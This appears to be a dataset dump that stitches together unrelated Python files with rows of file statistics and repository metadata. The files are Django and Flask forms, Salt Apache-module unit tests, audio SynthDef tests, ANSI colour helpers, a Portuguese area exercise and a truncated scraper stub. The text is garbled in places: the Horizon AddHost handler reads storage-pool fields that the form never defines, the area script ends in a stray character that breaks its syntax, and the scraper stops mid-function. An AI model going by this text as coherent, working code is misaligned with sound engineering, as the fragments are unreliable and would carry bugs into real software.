# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from django.core import validators
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils.validators import validate_port_range
from horizon.utils import fields
import logging
from vsm_dashboard.api import vsm as vsm_api
LOG = logging.getLogger(__name__)
class AddHost(forms.SelfHandlingForm):
failure_url = 'horizon:vsm:storageservermgmt:index'
host_name = forms.CharField(label=_("Host name"),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput(),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
server_type = forms.ChoiceField(label=_('Server Type'))
zone = forms.ChoiceField(label=_('Zone'))
def __init__(self, request, *args, **kwargs):
super(AddHost, self).__init__(request, *args, **kwargs)
self.fields['server_type'].choices = [('storage', 'storage'),
('monitor', 'monitor'),
('mixed', 'storage, monitor')]
self.fields['zone'].choices = [('zone_a', 'zone_a'),
('zone_b', 'zone_b')]
def handle(self, request, data):
try:
body = {
'pool': {
'name': data['name'],
'storageGroupId': data['storage_group'],
'replicationFactor': data['replication_factor'],
'clusterId': '0',
'createdBy': 'VSM'
}
}
rsp, ret = vsm_api.create_storage_pool(request,body=body)
res = str(ret['message']).strip( )
if res.startswith('pool') and res.endswith('created'):
messages.success(request,
_('Successfully created storage pool: %s')
% data['name'])
else:
messages.error(request,
_('Because %s, failed to create storage pool')
% ret['message'])
return ret
except:
redirect = reverse("horizon:vsm:poolsmanagement:index")
exceptions.handle(request,
_('Unable to create storage pool.'),
redirect=redirect)
class AddHosts(forms.SelfHandlingForm):
failure_url = 'horizon:vsm:storageservermgmt:index'
host_name = forms.CharField(label=_("Host name"),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput(),
max_length=255,
min_length=1,
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
server_type = forms.ChoiceField(label=_('Server Type'))
zone = forms.ChoiceField(label=_('Zone'))
def __init__(self, request, *args, **kwargs):
super(AddHosts, self).__init__(request, *args, **kwargs)
self.fields['server_type'].choices = [('storage', 'storage'),
('monitor', 'monitor'),
('mixed', 'storage, monitor')]
self.fields['zone'].choices = [('zone_a', 'zone_a'),
('zone_b', 'zone_b')]
def handle(self, request, data):
try:
body = {
'pool': {
'name': data['name'],
'storageGroupId': data['storage_group'],
'replicationFactor': data['replication_factor'],
'clusterId': '0',
'createdBy': 'VSM'
}
}
rsp, ret = vsm_api.create_storage_pool(request,body=body)
res = str(ret['message']).strip( )
if res.startswith('pool') and res.endswith('created'):
messages.success(request,
_('Successfully created storage pool: %s')
% data['name'])
else:
messages.error(request,
_('Because %s, failed to create storage pool')
% ret['message'])
return ret
except:
redirect = reverse("horizon:vsm:poolsmanagement:index")
exceptions.handle(request,
_('Unable to create storage pool.'),
redirect=redirect)
| 41.691358 | 78 | 0.490672 | 584 | 6,754 | 5.520548 | 0.291096 | 0.027295 | 0.031638 | 0.01861 | 0.739454 | 0.739454 | 0.739454 | 0.739454 | 0.739454 | 0.739454 | 0 | 0.006494 | 0.407166 | 6,754 | 161 | 79 | 41.950311 | 0.798701 | 0.084691 | 0 | 0.842975 | 0 | 0 | 0.198119 | 0.022049 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033058 | false | 0.033058 | 0.082645 | 0 | 0.231405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed10d986ec3c4ebbb14ab767b75a140932e36102 | 536 | py | Python | app/forms/changepw.py | digitalsirkeith/lets-studEEE | ad7d8b29f5084bc13c3e46c6a1b4676077f747a7 | [
"MIT"
] | null | null | null | app/forms/changepw.py | digitalsirkeith/lets-studEEE | ad7d8b29f5084bc13c3e46c6a1b4676077f747a7 | [
"MIT"
] | 22 | 2020-04-01T08:16:06.000Z | 2020-09-24T21:33:56.000Z | app/forms/changepw.py | digitalsirkeith/lets-studEEE | ad7d8b29f5084bc13c3e46c6a1b4676077f747a7 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import PasswordField
from wtforms.validators import DataRequired, InputRequired, EqualTo
class ChangePasswordForm(FlaskForm):
old_password = PasswordField('old_password', validators=[DataRequired(), InputRequired()])
new_password = PasswordField('new_password', validators=[DataRequired(), InputRequired(),
EqualTo('confirm', message='Passwords must match')])
confirm = PasswordField('confirm', validators=[DataRequired(), InputRequired()]) | 59.555556 | 94 | 0.735075 | 47 | 536 | 8.276596 | 0.446809 | 0.257069 | 0.269923 | 0.22108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158582 | 536 | 9 | 95 | 59.555556 | 0.862528 | 0 | 0 | 0 | 0 | 0 | 0.108007 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.75 | 0.375 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
ed3219e6ca62c15df24225139d7b567630908a94 | 152 | py | Python | tensorclan/dataset/__init__.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | null | null | null | tensorclan/dataset/__init__.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 11 | 2020-07-31T02:26:29.000Z | 2022-02-08T18:59:59.000Z | tensorclan/dataset/__init__.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 1 | 2020-11-24T17:02:54.000Z | 2020-11-24T17:02:54.000Z | from .base_dataset import BaseDataset
from .zoo import *
from .dataset import dataset, get_dataset, get_dataset_cls
from .utils import get_mean_and_std
| 30.4 | 58 | 0.835526 | 24 | 152 | 5 | 0.5 | 0.216667 | 0.283333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118421 | 152 | 4 | 59 | 38 | 0.895522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ed5e1f19f04f6a2723d5c0c6af47c73c83ff25dd | 13,876 | py | Python | tests/unit/modules/test_deb_apache.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | [
"Apache-2.0"
] | 1 | 2022-02-09T06:40:14.000Z | 2022-02-09T06:40:14.000Z | tests/unit/modules/test_deb_apache.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | [
"Apache-2.0"
] | null | null | null | tests/unit/modules/test_deb_apache.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | [
"Apache-2.0"
] | 4 | 2020-11-04T06:28:05.000Z | 2022-02-09T10:54:49.000Z | # -*- coding: utf-8 -*-
'''
:codeauthor: Jayesh Kariya <jayeshk@saltstack.com>
'''
# Import Python libs
from __future__ import absolute_import
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import Salt Libs
import salt.modules.deb_apache as deb_apache
@skipIf(NO_MOCK, NO_MOCK_REASON)
class DebApacheTestCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.modules.deb_apache
'''
def setup_loader_modules(self):
return {deb_apache: {}}
# 'check_site_enabled' function tests: 3
def test_check_site_enabled(self):
'''
Test if the specific Site symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=True)):
self.assertTrue(deb_apache.check_site_enabled('saltstack.com'))
def test_check_site_enabled_default(self):
'''
Test if the specific Site symlink is enabled.
'''
with patch('os.path.islink', MagicMock(side_effect=[False, True])):
self.assertTrue(deb_apache.check_site_enabled('default'))
def test_check_site_enabled_false(self):
'''
Test if the specific Site symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=False)):
self.assertFalse(deb_apache.check_site_enabled('saltstack.com'))
# 'a2ensite' function tests: 4
def test_a2ensite_notfound(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(return_value=1)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2ensite('saltstack.com'),
{'Name': 'Apache2 Enable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com Not found'})
def test_a2ensite_enabled(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2ensite('saltstack.com'),
{'Name': 'Apache2 Enable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com enabled'})
def test_a2ensite(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2ensite('saltstack.com'),
{'Name': 'Apache2 Enable Site',
'Site': 'saltstack.com',
'Status': 2})
def test_a2ensite_exception(self):
'''
Test if it runs a2ensite for the given site.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2ensite('saltstack.com')),
'error')
# 'a2dissite' function tests: 4
def test_a2dissite_notfound(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(return_value=256)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dissite('saltstack.com'),
{'Name': 'Apache2 Disable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com Not found'})
def test_a2dissite_disabled(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dissite('saltstack.com'),
{'Name': 'Apache2 Disable Site',
'Site': 'saltstack.com',
'Status': 'Site saltstack.com disabled'})
def test_a2dissite(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dissite('saltstack.com'),
{'Name': 'Apache2 Disable Site',
'Site': 'saltstack.com',
'Status': 2})
def test_a2dissite_exception(self):
'''
Test if it runs a2dissite for the given site.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2dissite('saltstack.com')),
'error')
# 'check_mod_enabled' function tests: 2
def test_check_mod_enabled(self):
'''
Test if the specific mod symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=True)):
self.assertTrue(deb_apache.check_mod_enabled('status.conf'))
def test_check_mod_enabled_false(self):
'''
Test if the specific mod symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=False)):
self.assertFalse(deb_apache.check_mod_enabled('status.conf'))
# 'a2enmod' function tests: 4
def test_a2enmod_notfound(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(return_value=1)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enmod('vhost_alias'),
{'Name': 'Apache2 Enable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias Not found'})
def test_a2enmod_enabled(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enmod('vhost_alias'),
{'Name': 'Apache2 Enable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias enabled'})
def test_a2enmod(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enmod('vhost_alias'),
{'Name': 'Apache2 Enable Mod',
'Mod': 'vhost_alias',
'Status': 2})
def test_a2enmod_exception(self):
'''
Test if it runs a2enmod for the given module.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2enmod('vhost_alias')),
'error')
# 'a2dismod' function tests: 4
def test_a2dismod_notfound(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(return_value=256)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dismod('vhost_alias'),
{'Name': 'Apache2 Disable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias Not found'})
def test_a2dismod_disabled(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dismod('vhost_alias'),
{'Name': 'Apache2 Disable Mod',
'Mod': 'vhost_alias',
'Status': 'Mod vhost_alias disabled'})
def test_a2dismod(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2dismod('vhost_alias'),
{'Name': 'Apache2 Disable Mod',
'Mod': 'vhost_alias',
'Status': 2})
def test_a2dismod_exception(self):
'''
Test if it runs a2dismod for the given module.
'''
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2dismod('vhost_alias')),
'error')
# 'check_conf_enabled' function tests: 2
def test_check_conf_enabled(self):
'''
Test if the specific conf symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=True)):
self.assertTrue(deb_apache.check_conf_enabled('security.conf'))
def test_check_conf_enabled_false(self):
'''
Test if the specific conf symlink is enabled.
'''
with patch('os.path.islink', MagicMock(return_value=False)):
self.assertFalse(deb_apache.check_conf_enabled('security.conf'))
# 'a2enconf' function tests: 4
def test_a2enconf_notfound(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(return_value=1)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enconf('security'),
{'Name': 'Apache2 Enable Conf',
'Conf': 'security',
'Status': 'Conf security Not found'})
def test_a2enconf_enabled(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enconf('security'),
{'Name': 'Apache2 Enable Conf',
'Conf': 'security',
'Status': 'Conf security enabled'})
def test_a2enconf(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2enconf('security'),
{'Name': 'Apache2 Enable Conf',
'Conf': 'security',
'Status': 2})
def test_a2enconf_exception(self):
'''
Test if it runs a2enconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2enconf')):
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2enconf('security')),
'error')
# 'a2disconf' function tests: 4
def test_a2disconf_notfound(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(return_value=256)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2disconf('security'),
{'Name': 'Apache2 Disable Conf',
'Conf': 'security',
'Status': 'Conf security Not found'})
def test_a2disconf_disabled(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(return_value=0)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2disconf('security'),
{'Name': 'Apache2 Disable Conf',
'Conf': 'security',
'Status': 'Conf security disabled'})
def test_a2disconf(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(return_value=2)
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(deb_apache.a2disconf('security'),
{'Name': 'Apache2 Disable Conf',
'Conf': 'security',
'Status': 2})
def test_a2disconf_exception(self):
'''
Test if it runs a2disconf for the given conf.
'''
with patch('salt.utils.which', MagicMock(return_value='a2disconf')):
mock = MagicMock(side_effect=Exception('error'))
with patch.dict(deb_apache.__salt__, {'cmd.retcode': mock}):
self.assertEqual(str(deb_apache.a2disconf('security')),
'error')
| 38.868347 | 76 | 0.555564 | 1,462 | 13,876 | 5.059508 | 0.070451 | 0.071786 | 0.086522 | 0.038935 | 0.881979 | 0.833852 | 0.81114 | 0.778829 | 0.767203 | 0.767203 | 0 | 0.015386 | 0.325526 | 13,876 | 356 | 77 | 38.977528 | 0.774976 | 0.135774 | 0 | 0.673367 | 0 | 0 | 0.180872 | 0 | 0 | 0 | 0 | 0 | 0.155779 | 1 | 0.160804 | false | 0 | 0.025126 | 0.005025 | 0.19598 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
71f4bb5debc740817a602abfca31efecb20fca24 | 681 | py | Python | bg/chalk.py | Throvn/pychalk | b78493cfc1797774b09ea0b4632f83e558efc448 | [
"MIT"
] | 2 | 2020-11-24T15:51:15.000Z | 2021-01-20T03:52:53.000Z | bg/chalk.py | Throvn/pychalk | b78493cfc1797774b09ea0b4632f83e558efc448 | [
"MIT"
] | null | null | null | bg/chalk.py | Throvn/pychalk | b78493cfc1797774b09ea0b4632f83e558efc448 | [
"MIT"
] | null | null | null | def green(text):
return '\033[42m' + text + '\033[0m'
def blue(text):
return '\033[44m' + text + '\033[0m'
def yellow(text):
return '\033[43m' + text + '\033[0m'
def red(text):
return '\033[41m' + text + '\033[0m'
def white(text):
return '\u001b[47m' + text + '\033[0m'
def black(text):
return '\u001b[40m' + text + '\033[0m'
def magenta(text):
return '\u001b[45m' + text + '\033[0m'
def cyan(text):
return '\u001b[46m' + text + '\033[0m'
# Decorations
def bold(text):
return '\033[1m' + text + '\033[0m'
def underline(text):
return '\033[4m' + text + '\033[0m'
def reversed(text):
return '\033[7m' + text + '\033[0m' | 19.457143 | 42 | 0.563877 | 100 | 681 | 3.84 | 0.29 | 0.286458 | 0.257813 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.22467 | 681 | 35 | 43 | 19.457143 | 0.545455 | 0.016153 | 0 | 0 | 0 | 0 | 0.254111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
9c15707ecc1cbd3284e63d154df80e014cd5996a | 5,577 | py | Python | tests/synthdefs/test_synthdefs_SynthDefFactory.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/synthdefs/test_synthdefs_SynthDefFactory.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | tests/synthdefs/test_synthdefs_SynthDefFactory.py | deeuu/supriya | 14fcb5316eccb4dafbe498932ceff56e1abb9d27 | [
"MIT"
] | null | null | null | import uqbar.strings
import supriya.ugens
from supriya import SynthDefFactory
def test_gate_01():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output()
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- BinaryOpUGen(MULTIPLICATION).ar:
left: SinOsc.ar[0]
right: Linen.kr[0]
- Out.ar:
bus: Control.ir[0:out]
source[0]: BinaryOpUGen(MULTIPLICATION).ar[0]
"""
)
+ "\n"
)
def test_gate_02():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output(crossfaded=True)
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- BinaryOpUGen(MULTIPLICATION).kr:
left: Control.kr[1:mix]
right: Linen.kr[0]
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- XOut.ar:
bus: Control.ir[0:out]
crossfade: BinaryOpUGen(MULTIPLICATION).kr[0]
source[0]: SinOsc.ar[0]
"""
)
+ "\n"
)
def test_gate_03():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output(crossfaded=True, windowed=True)
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Line.kr:
done_action: 2.0
duration: Control.ir[0:duration]
start: 0.0
stop: 1.0
- UnaryOpUGen(HANNING_WINDOW).kr:
source: Line.kr[0]
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- BinaryOpUGen(MULTIPLICATION).kr:
left: UnaryOpUGen(HANNING_WINDOW).kr[0]
right: Linen.kr[0]
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- XOut.ar:
bus: Control.ir[1:out]
crossfade: BinaryOpUGen(MULTIPLICATION).kr[0]
source[0]: SinOsc.ar[0]
"""
)
+ "\n"
)
def test_gate_04():
def signal_block(builder, source, state):
return supriya.ugens.SinOsc.ar()
factory = SynthDefFactory(channel_count=1)
factory = factory.with_signal_block(signal_block)
factory = factory.with_gate()
factory = factory.with_output(crossfaded=True, leveled=True, windowed=True)
assert (
str(factory.build(name="test"))
== uqbar.strings.normalize(
"""
synthdef:
name: test
ugens:
- Control.ir: null
- Line.kr:
done_action: 2.0
duration: Control.ir[0:duration]
start: 0.0
stop: 1.0
- UnaryOpUGen(HANNING_WINDOW).kr:
source: Line.kr[0]
- Control.kr: null
- Linen.kr:
attack_time: 0.02
done_action: 2.0
gate: Control.kr[0:gate]
release_time: 0.02
sustain_level: 1.0
- BinaryOpUGen(MULTIPLICATION).kr/0:
left: UnaryOpUGen(HANNING_WINDOW).kr[0]
right: Control.kr[1:level]
- BinaryOpUGen(MULTIPLICATION).kr/1:
left: BinaryOpUGen(MULTIPLICATION).kr/0[0]
right: Linen.kr[0]
- SinOsc.ar:
frequency: 440.0
phase: 0.0
- XOut.ar:
bus: Control.ir[1:out]
crossfade: BinaryOpUGen(MULTIPLICATION).kr/1[0]
source[0]: SinOsc.ar[0]
"""
)
+ "\n"
)
| 31.508475 | 79 | 0.467097 | 546 | 5,577 | 4.664835 | 0.131868 | 0.018846 | 0.084806 | 0.028269 | 0.897134 | 0.891637 | 0.878288 | 0.846879 | 0.846879 | 0.835885 | 0 | 0.039519 | 0.432849 | 5,577 | 176 | 80 | 31.6875 | 0.765729 | 0 | 0 | 0.654545 | 0 | 0 | 0.013158 | 0 | 0 | 0 | 0 | 0 | 0.072727 | 1 | 0.145455 | false | 0 | 0.054545 | 0.072727 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c6002868cf1def601a4421a1cdbbeeb76a7e94a | 210 | py | Python | code_delivery/ext/cli/__init__.py | castilhoin/code-delivery | 39073341f468d5d1e30b5d5910c043953e4b9429 | [
"MIT"
] | null | null | null | code_delivery/ext/cli/__init__.py | castilhoin/code-delivery | 39073341f468d5d1e30b5d5910c043953e4b9429 | [
"MIT"
] | null | null | null | code_delivery/ext/cli/__init__.py | castilhoin/code-delivery | 39073341f468d5d1e30b5d5910c043953e4b9429 | [
"MIT"
] | null | null | null | from code_delivery.ext.db import db
from code_delivery.ext.db import models
def init_app(app):
@app.cli.command()
def create_db():
"""This command initializes the db"""
db.create_all()
| 23.333333 | 45 | 0.67619 | 32 | 210 | 4.28125 | 0.53125 | 0.116788 | 0.233577 | 0.277372 | 0.394161 | 0.394161 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209524 | 210 | 8 | 46 | 26.25 | 0.825301 | 0.147619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9c78a842f25827139018c5c99ebb0f1ce3e54abd | 176 | py | Python | exercicios-turtle/.history/area_20210624131530.py | Aleff13/poo-ufsc | bc1574df26f840a3c0fd5b1e0c72e5d69f61493d | [
"MIT"
] | 1 | 2021-11-28T18:49:21.000Z | 2021-11-28T18:49:21.000Z | exercicios-turtle/.history/area_20210624131530.py | Aleff13/poo-ufsc | bc1574df26f840a3c0fd5b1e0c72e5d69f61493d | [
"MIT"
] | null | null | null | exercicios-turtle/.history/area_20210624131530.py | Aleff13/poo-ufsc | bc1574df26f840a3c0fd5b1e0c72e5d69f61493d | [
"MIT"
] | null | null | null | print('A seguir digite o valor do lado de um quadrado para saber sua área')
lado = float(input('digite o valor do lado: '))
area = lado**2
print('O valor da área é: ',area)9 | 25.142857 | 75 | 0.693182 | 34 | 176 | 3.588235 | 0.647059 | 0.147541 | 0.196721 | 0.229508 | 0.295082 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013986 | 0.1875 | 176 | 7 | 76 | 25.142857 | 0.839161 | 0 | 0 | 0 | 0 | 0 | 0.615819 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
92dac1a798bbb71a144499b710829e1ba02b259d | 1,172 | py | Python | get_info_fun.py | tankririri/purch-info-spider | 7058a852bad1d113467831cc8ffe9134f565fe09 | [
"MIT"
] | 5 | 2020-03-31T01:41:12.000Z | 2021-12-10T10:25:30.000Z | get_info_fun.py | tankririri/purch-info-spider | 7058a852bad1d113467831cc8ffe9134f565fe09 | [
"MIT"
] | null | null | null | get_info_fun.py | tankririri/purch-info-spider | 7058a852bad1d113467831cc8ffe9134f565fe09 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'一个招投标网站信息采集工具'
__author__ = 'Zhang Minghao'
#读取配置文件
import time, logger
def get_class(driver, url, info_class_name):
attempts = 0
success = False
while attempts < 3 and not success:
try:
